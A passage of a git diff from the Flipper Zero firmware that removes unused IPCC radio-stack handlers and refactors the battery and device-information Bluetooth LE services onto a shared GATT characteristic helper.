HW_IPCC_MAC_802_15_4_NOTIFICATION_ACK_CHANNEL); - - return; -} - -static void HW_IPCC_MAC_802_15_4_CmdEvtHandler(void) { - LL_C1_IPCC_DisableTransmitChannel(IPCC, HW_IPCC_MAC_802_15_4_CMD_RSP_CHANNEL); - - HW_IPCC_MAC_802_15_4_CmdEvtNot(); - - return; -} - -static void HW_IPCC_MAC_802_15_4_NotEvtHandler(void) { - LL_C1_IPCC_DisableReceiveChannel(IPCC, HW_IPCC_MAC_802_15_4_NOTIFICATION_ACK_CHANNEL); - - HW_IPCC_MAC_802_15_4_EvtNot(); - - return; -} -__weak void HW_IPCC_MAC_802_15_4_CmdEvtNot(void){}; -__weak void HW_IPCC_MAC_802_15_4_EvtNot(void){}; -#endif - -/****************************************************************************** - * THREAD - ******************************************************************************/ -#ifdef THREAD_WB -void HW_IPCC_THREAD_Init(void) { - LL_C1_IPCC_EnableReceiveChannel(IPCC, HW_IPCC_THREAD_NOTIFICATION_ACK_CHANNEL); - LL_C1_IPCC_EnableReceiveChannel(IPCC, HW_IPCC_THREAD_CLI_NOTIFICATION_ACK_CHANNEL); - - return; -} - -void HW_IPCC_OT_SendCmd(void) { - LL_C1_IPCC_SetFlag_CHx(IPCC, HW_IPCC_THREAD_OT_CMD_RSP_CHANNEL); - LL_C1_IPCC_EnableTransmitChannel(IPCC, HW_IPCC_THREAD_OT_CMD_RSP_CHANNEL); - - return; -} - -void HW_IPCC_CLI_SendCmd(void) { - LL_C1_IPCC_SetFlag_CHx(IPCC, HW_IPCC_THREAD_CLI_CMD_CHANNEL); - - return; -} - -void HW_IPCC_THREAD_SendAck(void) { - LL_C1_IPCC_ClearFlag_CHx(IPCC, HW_IPCC_THREAD_NOTIFICATION_ACK_CHANNEL); - LL_C1_IPCC_EnableReceiveChannel(IPCC, HW_IPCC_THREAD_NOTIFICATION_ACK_CHANNEL); - - return; -} - -void HW_IPCC_THREAD_CliSendAck(void) { - LL_C1_IPCC_ClearFlag_CHx(IPCC, HW_IPCC_THREAD_CLI_NOTIFICATION_ACK_CHANNEL); - LL_C1_IPCC_EnableReceiveChannel(IPCC, HW_IPCC_THREAD_CLI_NOTIFICATION_ACK_CHANNEL); - - return; -} - -static void HW_IPCC_OT_CmdEvtHandler(void) { - LL_C1_IPCC_DisableTransmitChannel(IPCC, HW_IPCC_THREAD_OT_CMD_RSP_CHANNEL); - - HW_IPCC_OT_CmdEvtNot(); - - return; -} - -static void HW_IPCC_THREAD_NotEvtHandler(void) { - LL_C1_IPCC_DisableReceiveChannel(IPCC, HW_IPCC_THREAD_NOTIFICATION_ACK_CHANNEL); - - HW_IPCC_THREAD_EvtNot(); - - return; -} - -static void HW_IPCC_THREAD_CliNotEvtHandler(void) { - LL_C1_IPCC_DisableReceiveChannel(IPCC, HW_IPCC_THREAD_CLI_NOTIFICATION_ACK_CHANNEL); - - HW_IPCC_THREAD_CliEvtNot(); - - return; -} - -__weak void HW_IPCC_OT_CmdEvtNot(void){}; -__weak void HW_IPCC_CLI_CmdEvtNot(void){}; -__weak void HW_IPCC_THREAD_EvtNot(void){}; - -#endif /* THREAD_WB */ - -/****************************************************************************** - * LLD TESTS - ******************************************************************************/ -#ifdef LLD_TESTS_WB -void HW_IPCC_LLDTESTS_Init(void) { - LL_C1_IPCC_EnableReceiveChannel(IPCC, HW_IPCC_LLDTESTS_CLI_RSP_CHANNEL); - LL_C1_IPCC_EnableReceiveChannel(IPCC, HW_IPCC_LLDTESTS_M0_CMD_CHANNEL); - return; -} - -void HW_IPCC_LLDTESTS_SendCliCmd(void) { - LL_C1_IPCC_SetFlag_CHx(IPCC, HW_IPCC_LLDTESTS_CLI_CMD_CHANNEL); - return; -} - -static void HW_IPCC_LLDTESTS_ReceiveCliRspHandler(void) { - LL_C1_IPCC_DisableReceiveChannel(IPCC, HW_IPCC_LLDTESTS_CLI_RSP_CHANNEL); - HW_IPCC_LLDTESTS_ReceiveCliRsp(); - return; -} - -void HW_IPCC_LLDTESTS_SendCliRspAck(void) { - LL_C1_IPCC_ClearFlag_CHx(IPCC, HW_IPCC_LLDTESTS_CLI_RSP_CHANNEL); - LL_C1_IPCC_EnableReceiveChannel(IPCC, HW_IPCC_LLDTESTS_CLI_RSP_CHANNEL); - return; -} - -static void HW_IPCC_LLDTESTS_ReceiveM0CmdHandler(void) { - LL_C1_IPCC_DisableReceiveChannel(IPCC, HW_IPCC_LLDTESTS_M0_CMD_CHANNEL); - HW_IPCC_LLDTESTS_ReceiveM0Cmd(); - return; -} - -void HW_IPCC_LLDTESTS_SendM0CmdAck(void) { - LL_C1_IPCC_ClearFlag_CHx(IPCC, HW_IPCC_LLDTESTS_M0_CMD_CHANNEL); - LL_C1_IPCC_EnableReceiveChannel(IPCC, HW_IPCC_LLDTESTS_M0_CMD_CHANNEL); - return; -} -__weak void HW_IPCC_LLDTESTS_ReceiveCliRsp(void){}; -__weak void HW_IPCC_LLDTESTS_ReceiveM0Cmd(void){}; -#endif /* LLD_TESTS_WB */ - -/****************************************************************************** - * LLD BLE - ******************************************************************************/ -#ifdef LLD_BLE_WB -void HW_IPCC_LLD_BLE_Init(void) { - LL_C1_IPCC_EnableReceiveChannel(IPCC, HW_IPCC_LLD_BLE_RSP_CHANNEL); - LL_C1_IPCC_EnableReceiveChannel(IPCC, HW_IPCC_LLD_BLE_M0_CMD_CHANNEL); - return; -} - -void HW_IPCC_LLD_BLE_SendCliCmd(void) { - LL_C1_IPCC_SetFlag_CHx(IPCC, HW_IPCC_LLD_BLE_CLI_CMD_CHANNEL); - return; -} - -/*static void HW_IPCC_LLD_BLE_ReceiveCliRspHandler( void ) -{ - LL_C1_IPCC_DisableReceiveChannel( IPCC, HW_IPCC_LLD_BLE_CLI_RSP_CHANNEL ); - HW_IPCC_LLD_BLE_ReceiveCliRsp(); - return; -}*/ - -void HW_IPCC_LLD_BLE_SendCliRspAck(void) { - LL_C1_IPCC_ClearFlag_CHx(IPCC, HW_IPCC_LLD_BLE_CLI_RSP_CHANNEL); - LL_C1_IPCC_EnableReceiveChannel(IPCC, HW_IPCC_LLD_BLE_CLI_RSP_CHANNEL); - return; -} - -static void HW_IPCC_LLD_BLE_ReceiveM0CmdHandler(void) { - //LL_C1_IPCC_DisableReceiveChannel( IPCC, HW_IPCC_LLD_BLE_M0_CMD_CHANNEL ); - HW_IPCC_LLD_BLE_ReceiveM0Cmd(); - return; -} - -void HW_IPCC_LLD_BLE_SendM0CmdAck(void) { - LL_C1_IPCC_ClearFlag_CHx(IPCC, HW_IPCC_LLD_BLE_M0_CMD_CHANNEL); - //LL_C1_IPCC_EnableReceiveChannel( IPCC, HW_IPCC_LLD_BLE_M0_CMD_CHANNEL ); - return; -} -__weak void HW_IPCC_LLD_BLE_ReceiveCliRsp(void){}; -__weak void HW_IPCC_LLD_BLE_ReceiveM0Cmd(void){}; - -/* Transparent Mode */ -void HW_IPCC_LLD_BLE_SendCmd(void) { - LL_C1_IPCC_SetFlag_CHx(IPCC, HW_IPCC_LLD_BLE_CMD_CHANNEL); - return; -} - -static void HW_IPCC_LLD_BLE_ReceiveRspHandler(void) { - LL_C1_IPCC_DisableReceiveChannel(IPCC, HW_IPCC_LLD_BLE_RSP_CHANNEL); - HW_IPCC_LLD_BLE_ReceiveRsp(); - return; -} - -void HW_IPCC_LLD_BLE_SendRspAck(void) { - LL_C1_IPCC_ClearFlag_CHx(IPCC, HW_IPCC_LLD_BLE_RSP_CHANNEL); - LL_C1_IPCC_EnableReceiveChannel(IPCC, HW_IPCC_LLD_BLE_RSP_CHANNEL); - return; -} - -#endif /* LLD_BLE_WB */ - -/****************************************************************************** - * ZIGBEE - ******************************************************************************/ -#ifdef ZIGBEE_WB -void HW_IPCC_ZIGBEE_Init(void) { - LL_C1_IPCC_EnableReceiveChannel(IPCC, HW_IPCC_ZIGBEE_APPLI_NOTIF_ACK_CHANNEL); - LL_C1_IPCC_EnableReceiveChannel(IPCC, HW_IPCC_ZIGBEE_M0_REQUEST_CHANNEL); - - return; -} - -void HW_IPCC_ZIGBEE_SendM4RequestToM0(void) { - LL_C1_IPCC_SetFlag_CHx(IPCC, HW_IPCC_ZIGBEE_CMD_APPLI_CHANNEL); - LL_C1_IPCC_EnableTransmitChannel(IPCC, HW_IPCC_ZIGBEE_CMD_APPLI_CHANNEL); - - return; -} - -void HW_IPCC_ZIGBEE_SendM4AckToM0Notify(void) { - LL_C1_IPCC_ClearFlag_CHx(IPCC, HW_IPCC_ZIGBEE_APPLI_NOTIF_ACK_CHANNEL); - LL_C1_IPCC_EnableReceiveChannel(IPCC, HW_IPCC_ZIGBEE_APPLI_NOTIF_ACK_CHANNEL); - - return; -} - -static void HW_IPCC_ZIGBEE_CmdEvtHandler(void) { - LL_C1_IPCC_DisableTransmitChannel(IPCC, HW_IPCC_ZIGBEE_CMD_APPLI_CHANNEL); - - HW_IPCC_ZIGBEE_RecvAppliAckFromM0(); - - return; -} - -static void HW_IPCC_ZIGBEE_StackNotifEvtHandler(void) { - LL_C1_IPCC_DisableReceiveChannel(IPCC, HW_IPCC_ZIGBEE_APPLI_NOTIF_ACK_CHANNEL); - - HW_IPCC_ZIGBEE_RecvM0NotifyToM4(); - - return; -} - -static void HW_IPCC_ZIGBEE_StackM0RequestHandler(void) { - LL_C1_IPCC_DisableReceiveChannel(IPCC, HW_IPCC_ZIGBEE_M0_REQUEST_CHANNEL); - - HW_IPCC_ZIGBEE_RecvM0RequestToM4(); - - return; -} - -void HW_IPCC_ZIGBEE_SendM4AckToM0Request(void) { - LL_C1_IPCC_ClearFlag_CHx(IPCC, HW_IPCC_ZIGBEE_M0_REQUEST_CHANNEL); - LL_C1_IPCC_EnableReceiveChannel(IPCC, HW_IPCC_ZIGBEE_M0_REQUEST_CHANNEL); - - return; -} - -__weak void HW_IPCC_ZIGBEE_RecvAppliAckFromM0(void){}; -__weak void HW_IPCC_ZIGBEE_RecvM0NotifyToM4(void){}; -__weak void HW_IPCC_ZIGBEE_RecvM0RequestToM4(void){}; -#endif /* ZIGBEE_WB */ - -/****************************************************************************** - * MEMORY MANAGER - ******************************************************************************/ -void HW_IPCC_MM_SendFreeBuf(void (*cb)(void)) { +void HW_IPCC_MM_SendFreeBuf(void (*cb)()) { if(LL_C1_IPCC_IsActiveFlag_CHx(IPCC, HW_IPCC_MM_RELEASE_BUFFER_CHANNEL)) { FreeBufCb = cb; LL_C1_IPCC_EnableTransmitChannel(IPCC, HW_IPCC_MM_RELEASE_BUFFER_CHANNEL); @@ -557,37 +143,22 @@ void HW_IPCC_MM_SendFreeBuf(void (*cb)(void)) { LL_C1_IPCC_SetFlag_CHx(IPCC, HW_IPCC_MM_RELEASE_BUFFER_CHANNEL); } - - return; } -static void HW_IPCC_MM_FreeBufHandler(void) { +static void HW_IPCC_MM_FreeBufHandler() { LL_C1_IPCC_DisableTransmitChannel(IPCC, HW_IPCC_MM_RELEASE_BUFFER_CHANNEL); FreeBufCb(); LL_C1_IPCC_SetFlag_CHx(IPCC, HW_IPCC_MM_RELEASE_BUFFER_CHANNEL); - - return; } -/****************************************************************************** - * TRACES - ******************************************************************************/ -void HW_IPCC_TRACES_Init(void) { +void HW_IPCC_TRACES_Init() { LL_C1_IPCC_EnableReceiveChannel(IPCC, HW_IPCC_TRACES_CHANNEL); - - return; } -static void HW_IPCC_TRACES_EvtHandler(void) { +static void HW_IPCC_TRACES_EvtHandler() { HW_IPCC_TRACES_EvtNot(); LL_C1_IPCC_ClearFlag_CHx(IPCC, HW_IPCC_TRACES_CHANNEL); - - return; } - -__weak void HW_IPCC_TRACES_EvtNot(void){}; - -/******************* (C) COPYRIGHT 2019 STMicroelectronics *****END OF FILE****/ diff --git a/firmware/targets/f7/ble_glue/osal.h b/firmware/targets/f7/ble_glue/osal.h index e5e0c4f68..0cde06179 100644 --- a/firmware/targets/f7/ble_glue/osal.h +++ b/firmware/targets/f7/ble_glue/osal.h @@ -1,25 +1,4 @@ -/***************************************************************************** - * @file osal.h - * @author MDG - * @brief This header file defines the OS abstraction layer used by - * the BLE stack. OSAL defines the set of functions which needs to be - * ported to target operating system and target platform. - * Actually, only memset, memcpy and memcmp wrappers are defined. - ***************************************************************************** - * @attention - * - * Copyright (c) 2018-2022 STMicroelectronics. - * All rights reserved. - * - * This software is licensed under terms that can be found in the LICENSE file - * in the root directory of this software component. - * If no LICENSE file comes with this software, it is provided AS-IS. - * - ***************************************************************************** - */ - -#ifndef OSAL_H__ -#define OSAL_H__ +#pragma once /** * This function copies size number of bytes from a @@ -59,5 +38,3 @@ extern void* Osal_MemSet(void* ptr, int value, unsigned int size); * @return 0 if the two buffers are equal, 1 otherwise */ extern int Osal_MemCmp(const void* s1, const void* s2, unsigned int size); - -#endif /* OSAL_H__ */ diff --git a/firmware/targets/f7/ble_glue/battery_service.c b/firmware/targets/f7/ble_glue/services/battery_service.c similarity index 53% rename from firmware/targets/f7/ble_glue/battery_service.c rename to firmware/targets/f7/ble_glue/services/battery_service.c index 8c371efad..63f736b3b 100644 --- a/firmware/targets/f7/ble_glue/battery_service.c +++ b/firmware/targets/f7/ble_glue/services/battery_service.c @@ -1,5 +1,7 @@ #include "battery_service.h" #include "app_common.h" +#include "gatt_char.h" + #include #include @@ -7,12 +9,6 @@ #define TAG "BtBatterySvc" -typedef struct { - uint16_t svc_handle; - uint16_t battery_level_char_handle; - uint16_t power_state_char_handle; -} BatterySvc; - enum { // Common states BatterySvcPowerStateUnknown = 0b00, @@ -40,13 +36,44 @@ typedef struct { _Static_assert(sizeof(BattrySvcPowerState) == 1, "Incorrect structure size"); -static BatterySvc* battery_svc = NULL; - #define BATTERY_POWER_STATE (0x2A1A) static const uint16_t service_uuid = BATTERY_SERVICE_UUID; -static const uint16_t battery_level_char_uuid = BATTERY_LEVEL_CHAR_UUID; -static const uint16_t power_state_char_uuid = BATTERY_POWER_STATE; + +typedef enum { + BatterySvcGattCharacteristicBatteryLevel = 0, + BatterySvcGattCharacteristicPowerState, + BatterySvcGattCharacteristicCount, +} BatterySvcGattCharacteristicId; + +static const FlipperGattCharacteristicParams battery_svc_chars[BatterySvcGattCharacteristicCount] = + {[BatterySvcGattCharacteristicBatteryLevel] = + {.name = "Battery Level", + .data_prop_type = FlipperGattCharacteristicDataFixed, + .data.fixed.length = 1, + .uuid.Char_UUID_16 = BATTERY_LEVEL_CHAR_UUID, + .uuid_type = UUID_TYPE_16, + .char_properties = CHAR_PROP_READ | CHAR_PROP_NOTIFY, + .security_permissions = ATTR_PERMISSION_AUTHEN_READ, + .gatt_evt_mask = GATT_DONT_NOTIFY_EVENTS, + .is_variable = CHAR_VALUE_LEN_CONSTANT}, + [BatterySvcGattCharacteristicPowerState] = { + .name = "Power State", + .data_prop_type = FlipperGattCharacteristicDataFixed, + .data.fixed.length = 1, + .uuid.Char_UUID_16 = BATTERY_POWER_STATE, + .uuid_type = UUID_TYPE_16, + .char_properties = CHAR_PROP_READ | CHAR_PROP_NOTIFY, + .security_permissions = ATTR_PERMISSION_AUTHEN_READ, + .gatt_evt_mask = GATT_DONT_NOTIFY_EVENTS, + .is_variable = CHAR_VALUE_LEN_CONSTANT}}; + +typedef struct { + uint16_t svc_handle; + FlipperGattCharacteristicInstance chars[BatterySvcGattCharacteristicCount]; +} BatterySvc; + +static BatterySvc* battery_svc = NULL; void battery_svc_start() { battery_svc = malloc(sizeof(BatterySvc)); @@ -58,53 +85,19 @@ void battery_svc_start() { if(status) { FURI_LOG_E(TAG, "Failed to add Battery service: %d", status); } - // Add Battery level characteristic - status = aci_gatt_add_char( - battery_svc->svc_handle, - UUID_TYPE_16, - (Char_UUID_t*)&battery_level_char_uuid, - 1, - CHAR_PROP_READ | CHAR_PROP_NOTIFY, - ATTR_PERMISSION_AUTHEN_READ, - GATT_DONT_NOTIFY_EVENTS, - 10, - CHAR_VALUE_LEN_CONSTANT, - &battery_svc->battery_level_char_handle); - if(status) { - FURI_LOG_E(TAG, "Failed to add Battery level characteristic: %d", status); + for(size_t i = 0; i < BatterySvcGattCharacteristicCount; i++) { + flipper_gatt_characteristic_init( + battery_svc->svc_handle, &battery_svc_chars[i], &battery_svc->chars[i]); } - // Add Power state characteristic - status = aci_gatt_add_char( - battery_svc->svc_handle, - UUID_TYPE_16, - (Char_UUID_t*)&power_state_char_uuid, - 1, - CHAR_PROP_READ | CHAR_PROP_NOTIFY, - ATTR_PERMISSION_AUTHEN_READ, - GATT_DONT_NOTIFY_EVENTS, - 10, - CHAR_VALUE_LEN_CONSTANT, - &battery_svc->power_state_char_handle); - if(status) { - FURI_LOG_E(TAG, "Failed to add Battery level characteristic: %d", status); - } - // Update power state charachteristic + battery_svc_update_power_state(); } void battery_svc_stop() { tBleStatus status; if(battery_svc) { - // Delete Battery level characteristic - status = - aci_gatt_del_char(battery_svc->svc_handle, battery_svc->battery_level_char_handle); - if(status) { - FURI_LOG_E(TAG, "Failed to delete Battery level characteristic: %d", status); - } - // Delete Power state characteristic - status = aci_gatt_del_char(battery_svc->svc_handle, battery_svc->power_state_char_handle); - if(status) { - FURI_LOG_E(TAG, "Failed to delete Battery level characteristic: %d", status); + for(size_t i = 0; i < BatterySvcGattCharacteristicCount; i++) { + flipper_gatt_characteristic_delete(battery_svc->svc_handle, &battery_svc->chars[i]); } // Delete Battery service status = aci_gatt_del_service(battery_svc->svc_handle); @@ -126,13 +119,10 @@ bool battery_svc_update_level(uint8_t battery_charge) { return false; } // Update battery level characteristic - FURI_LOG_D(TAG, "Updating battery level characteristic"); - tBleStatus result = aci_gatt_update_char_value( - battery_svc->svc_handle, battery_svc->battery_level_char_handle, 0, 1, &battery_charge); - if(result) { - FURI_LOG_E(TAG, "Failed updating RX characteristic: %d", result); - } - return result != BLE_STATUS_SUCCESS; + return flipper_gatt_characteristic_update( + battery_svc->svc_handle, + &battery_svc->chars[BatterySvcGattCharacteristicBatteryLevel], + &battery_charge); } bool battery_svc_update_power_state() { @@ -152,15 +142,9 @@ bool battery_svc_update_power_state() { power_state.charging = BatterySvcPowerStateNotCharging; power_state.discharging = BatterySvcPowerStateDischarging; } - FURI_LOG_D(TAG, "Updating power state characteristic"); - tBleStatus result = aci_gatt_update_char_value( + + return flipper_gatt_characteristic_update( battery_svc->svc_handle, - battery_svc->power_state_char_handle, - 0, - 1, - (uint8_t*)&power_state); - if(result) { - FURI_LOG_E(TAG, "Failed updating Power state characteristic: %d", result); - } - return result != BLE_STATUS_SUCCESS; + &battery_svc->chars[BatterySvcGattCharacteristicPowerState], + &power_state); } diff --git a/firmware/targets/f7/ble_glue/battery_service.h b/firmware/targets/f7/ble_glue/services/battery_service.h similarity index 100% rename from firmware/targets/f7/ble_glue/battery_service.h rename to firmware/targets/f7/ble_glue/services/battery_service.h diff --git a/firmware/targets/f7/ble_glue/services/dev_info_service.c b/firmware/targets/f7/ble_glue/services/dev_info_service.c new file mode 100644 index 000000000..5bee97b41 --- /dev/null +++ b/firmware/targets/f7/ble_glue/services/dev_info_service.c @@ -0,0 +1,176 @@ +#include "dev_info_service.h" +#include "app_common.h" +#include "gatt_char.h" +#include + +#include +#include +#include + +#include "dev_info_service_uuid.inc" + +#define TAG "BtDevInfoSvc" + +typedef enum { + DevInfoSvcGattCharacteristicMfgName = 0, + DevInfoSvcGattCharacteristicSerial, + DevInfoSvcGattCharacteristicFirmwareRev, + DevInfoSvcGattCharacteristicSoftwareRev, + DevInfoSvcGattCharacteristicRpcVersion, + DevInfoSvcGattCharacteristicCount, +} DevInfoSvcGattCharacteristicId; + +#define DEVICE_INFO_HARDWARE_REV_SIZE 4 +typedef struct { + uint16_t service_handle; + FlipperGattCharacteristicInstance characteristics[DevInfoSvcGattCharacteristicCount]; + FuriString* version_string; + char hardware_revision[DEVICE_INFO_HARDWARE_REV_SIZE]; +} DevInfoSvc; + +static DevInfoSvc* dev_info_svc = NULL; + +static const char dev_info_man_name[] = "Flipper Devices Inc."; +static const char dev_info_serial_num[] = "1.0"; +static const char dev_info_rpc_version[] = TOSTRING(PROTOBUF_MAJOR_VERSION.PROTOBUF_MINOR_VERSION); + +static bool dev_info_char_firmware_rev_callback( + const void* context, + const uint8_t** data, + uint16_t* data_len) { + const DevInfoSvc* dev_info_svc = *(DevInfoSvc**)context; + *data_len = sizeof(dev_info_svc->hardware_revision); + if(data) { + *data = (const uint8_t*)&dev_info_svc->hardware_revision; + } + return false; +} + +static bool dev_info_char_software_rev_callback( + const void* context, + const uint8_t** data, + uint16_t* data_len) { + const DevInfoSvc* dev_info_svc = *(DevInfoSvc**)context; + *data_len = furi_string_size(dev_info_svc->version_string); + if(data) { + *data = (const uint8_t*)furi_string_get_cstr(dev_info_svc->version_string); + } + return false; +} + +static const FlipperGattCharacteristicParams dev_info_svc_chars[DevInfoSvcGattCharacteristicCount] = + {[DevInfoSvcGattCharacteristicMfgName] = + {.name = "Manufacturer Name", + .data_prop_type = FlipperGattCharacteristicDataFixed, + .data.fixed.length = sizeof(dev_info_man_name) - 1, + .data.fixed.ptr = (const uint8_t*)&dev_info_man_name, + .uuid.Char_UUID_16 = MANUFACTURER_NAME_UUID, + .uuid_type = UUID_TYPE_16, + .char_properties = CHAR_PROP_READ, + .security_permissions = ATTR_PERMISSION_AUTHEN_READ, + .gatt_evt_mask = GATT_DONT_NOTIFY_EVENTS, + .is_variable = CHAR_VALUE_LEN_CONSTANT}, + [DevInfoSvcGattCharacteristicSerial] = + {.name = "Serial Number", + .data_prop_type = FlipperGattCharacteristicDataFixed, + .data.fixed.length = sizeof(dev_info_serial_num) - 1, + .data.fixed.ptr = (const uint8_t*)&dev_info_serial_num, + .uuid.Char_UUID_16 = SERIAL_NUMBER_UUID, + .uuid_type = UUID_TYPE_16, + .char_properties = CHAR_PROP_READ, + .security_permissions = ATTR_PERMISSION_AUTHEN_READ, + .gatt_evt_mask = GATT_DONT_NOTIFY_EVENTS, + .is_variable = CHAR_VALUE_LEN_CONSTANT}, + [DevInfoSvcGattCharacteristicFirmwareRev] = + {.name = "Firmware Revision", + .data_prop_type = FlipperGattCharacteristicDataCallback, + .data.callback.context = &dev_info_svc, + .data.callback.fn = dev_info_char_firmware_rev_callback, + .uuid.Char_UUID_16 = FIRMWARE_REVISION_UUID, + .uuid_type = UUID_TYPE_16, + .char_properties = CHAR_PROP_READ, + .security_permissions = ATTR_PERMISSION_AUTHEN_READ, + .gatt_evt_mask = GATT_DONT_NOTIFY_EVENTS, + .is_variable = CHAR_VALUE_LEN_CONSTANT}, + [DevInfoSvcGattCharacteristicSoftwareRev] = + {.name = "Software Revision", + .data_prop_type = FlipperGattCharacteristicDataCallback, + .data.callback.context = &dev_info_svc, + .data.callback.fn = dev_info_char_software_rev_callback, + .uuid.Char_UUID_16 = SOFTWARE_REVISION_UUID, + .uuid_type = UUID_TYPE_16, + .char_properties = CHAR_PROP_READ, + .security_permissions = ATTR_PERMISSION_AUTHEN_READ, + .gatt_evt_mask = GATT_DONT_NOTIFY_EVENTS, + .is_variable = CHAR_VALUE_LEN_CONSTANT}, + [DevInfoSvcGattCharacteristicRpcVersion] = { + .name = "RPC Version", + .data_prop_type = FlipperGattCharacteristicDataFixed, + .data.fixed.length = sizeof(dev_info_rpc_version) - 1, + .data.fixed.ptr = (const uint8_t*)&dev_info_rpc_version, + .uuid.Char_UUID_128 = DEV_INVO_RPC_VERSION_UID, + .uuid_type = UUID_TYPE_128, + .char_properties = CHAR_PROP_READ, + .security_permissions = ATTR_PERMISSION_AUTHEN_READ, + .gatt_evt_mask = GATT_DONT_NOTIFY_EVENTS, + .is_variable = CHAR_VALUE_LEN_CONSTANT}}; + +void dev_info_svc_start() { + dev_info_svc = malloc(sizeof(DevInfoSvc)); + dev_info_svc->version_string = furi_string_alloc_printf( + "%s %s %s %s", + version_get_githash(NULL), + version_get_version(NULL), + version_get_gitbranchnum(NULL), + version_get_builddate(NULL)); + snprintf( + dev_info_svc->hardware_revision, + sizeof(dev_info_svc->hardware_revision), + "%d", + version_get_target(NULL)); + tBleStatus status; + + // Add Device Information Service + uint16_t uuid = DEVICE_INFORMATION_SERVICE_UUID; + status = aci_gatt_add_service( + UUID_TYPE_16, + (Service_UUID_t*)&uuid, + PRIMARY_SERVICE, + 1 + 2 * DevInfoSvcGattCharacteristicCount, + &dev_info_svc->service_handle); + if(status) { + FURI_LOG_E(TAG, "Failed to add Device Information Service: %d", status); + } + + for(size_t i = 0; i < DevInfoSvcGattCharacteristicCount; i++) { + flipper_gatt_characteristic_init( + dev_info_svc->service_handle, + &dev_info_svc_chars[i], + &dev_info_svc->characteristics[i]); + flipper_gatt_characteristic_update( + dev_info_svc->service_handle, &dev_info_svc->characteristics[i], NULL); + } +} + +void dev_info_svc_stop() { + tBleStatus status; + if(dev_info_svc) { + furi_string_free(dev_info_svc->version_string); + // Delete service characteristics + for(size_t i = 0; i < DevInfoSvcGattCharacteristicCount; i++) { + flipper_gatt_characteristic_delete( + dev_info_svc->service_handle, &dev_info_svc->characteristics[i]); + } + // Delete service + status = aci_gatt_del_service(dev_info_svc->service_handle); + if(status) { + FURI_LOG_E(TAG, "Failed to delete device info service: %d", status); + } + free(dev_info_svc); + dev_info_svc = NULL; + } +} + +bool dev_info_svc_is_started() { + return dev_info_svc != NULL; +} diff --git a/firmware/targets/f7/ble_glue/dev_info_service.h b/firmware/targets/f7/ble_glue/services/dev_info_service.h similarity index 100% rename from firmware/targets/f7/ble_glue/dev_info_service.h rename to firmware/targets/f7/ble_glue/services/dev_info_service.h diff --git a/firmware/targets/f7/ble_glue/services/dev_info_service_uuid.inc b/firmware/targets/f7/ble_glue/services/dev_info_service_uuid.inc new file mode 100644 index 000000000..ad520f62e --- /dev/null +++ b/firmware/targets/f7/ble_glue/services/dev_info_service_uuid.inc @@ -0,0 +1,3 @@ +#define DEV_INVO_RPC_VERSION_UID \ + { 0x33, 0xa9, 0xb5, 0x3e, 0x87, 0x5d, 0x1a, 0x8e, 0xc8, 0x47, 0x5e, 0xae, 0x6d, 0x66, 0xf6, 0x03 } + diff --git a/firmware/targets/f7/ble_glue/services/gatt_char.c b/firmware/targets/f7/ble_glue/services/gatt_char.c new file mode 100644 index 000000000..c06403f55 --- /dev/null +++ b/firmware/targets/f7/ble_glue/services/gatt_char.c @@ -0,0 +1,122 @@ +#include "gatt_char.h" + +#include + +#define TAG "GattChar" + +#define GATT_MIN_READ_KEY_SIZE (10) + +void flipper_gatt_characteristic_init( + uint16_t svc_handle, + const FlipperGattCharacteristicParams* char_descriptor, + FlipperGattCharacteristicInstance* char_instance) { + furi_assert(char_descriptor); + furi_assert(char_instance); + + // Copy the descriptor to the instance, since it may point to stack memory + char_instance->characteristic = malloc(sizeof(FlipperGattCharacteristicParams)); + memcpy( + (void*)char_instance->characteristic, + char_descriptor, + sizeof(FlipperGattCharacteristicParams)); + + uint16_t char_data_size = 0; + if(char_descriptor->data_prop_type == FlipperGattCharacteristicDataFixed) { + char_data_size = char_descriptor->data.fixed.length; + } else if(char_descriptor->data_prop_type == FlipperGattCharacteristicDataCallback) { + char_descriptor->data.callback.fn( + char_descriptor->data.callback.context, NULL, &char_data_size); + } + + tBleStatus status = aci_gatt_add_char( + svc_handle, + char_descriptor->uuid_type, + &char_descriptor->uuid, + char_data_size, + char_descriptor->char_properties, + char_descriptor->security_permissions, + char_descriptor->gatt_evt_mask, + GATT_MIN_READ_KEY_SIZE, + char_descriptor->is_variable, + &char_instance->handle); + if(status) { + FURI_LOG_E(TAG, "Failed to add %s char: %d", char_descriptor->name, status); + } + + char_instance->descriptor_handle = 0; + if((status == 0) && char_descriptor->descriptor_params) { + uint8_t const* char_data = NULL; + const FlipperGattCharacteristicDescriptorParams* char_data_descriptor = + char_descriptor->descriptor_params; + bool release_data = char_data_descriptor->data_callback.fn( + char_data_descriptor->data_callback.context, &char_data, &char_data_size); + + status = aci_gatt_add_char_desc( + svc_handle, + char_instance->handle, + char_data_descriptor->uuid_type, + &char_data_descriptor->uuid, + char_data_descriptor->max_length, + char_data_size, + char_data, + char_data_descriptor->security_permissions, + char_data_descriptor->access_permissions, + char_data_descriptor->gatt_evt_mask, + MIN_ENCRY_KEY_SIZE, + char_data_descriptor->is_variable, + &char_instance->descriptor_handle); + if(status) { + FURI_LOG_E(TAG, "Failed to add %s char descriptor: %d", char_descriptor->name, status); + } + if(release_data) { + free((void*)char_data); + } + } +} + +void flipper_gatt_characteristic_delete( + uint16_t svc_handle, + FlipperGattCharacteristicInstance* char_instance) { + tBleStatus status = aci_gatt_del_char(svc_handle, char_instance->handle); + if(status) { + FURI_LOG_E( + TAG, "Failed to delete %s char: %d", char_instance->characteristic->name, status); + } + free((void*)char_instance->characteristic); +} + +bool flipper_gatt_characteristic_update( + uint16_t svc_handle, + FlipperGattCharacteristicInstance* char_instance, + const void* source) { + furi_assert(char_instance); + const FlipperGattCharacteristicParams* char_descriptor = char_instance->characteristic; + FURI_LOG_D(TAG, "Updating %s char", char_descriptor->name); + + const uint8_t* char_data = NULL; + uint16_t char_data_size = 0; + bool release_data = false; + if(char_descriptor->data_prop_type == FlipperGattCharacteristicDataFixed) { + char_data = char_descriptor->data.fixed.ptr; + if(source) { + char_data = (uint8_t*)source; + } + char_data_size = char_descriptor->data.fixed.length; + } else if(char_descriptor->data_prop_type == FlipperGattCharacteristicDataCallback) { + const void* context = char_descriptor->data.callback.context; + if(source) { + context = source; + } + release_data = char_descriptor->data.callback.fn(context, &char_data, &char_data_size); + } + + tBleStatus result = aci_gatt_update_char_value( + svc_handle, char_instance->handle, 0, char_data_size, char_data); + if(result) { + FURI_LOG_E(TAG, "Failed updating %s characteristic: %d", char_descriptor->name, result); + } + if(release_data) { + free((void*)char_data); + } + return result != BLE_STATUS_SUCCESS; +} \ No newline at end of file diff --git 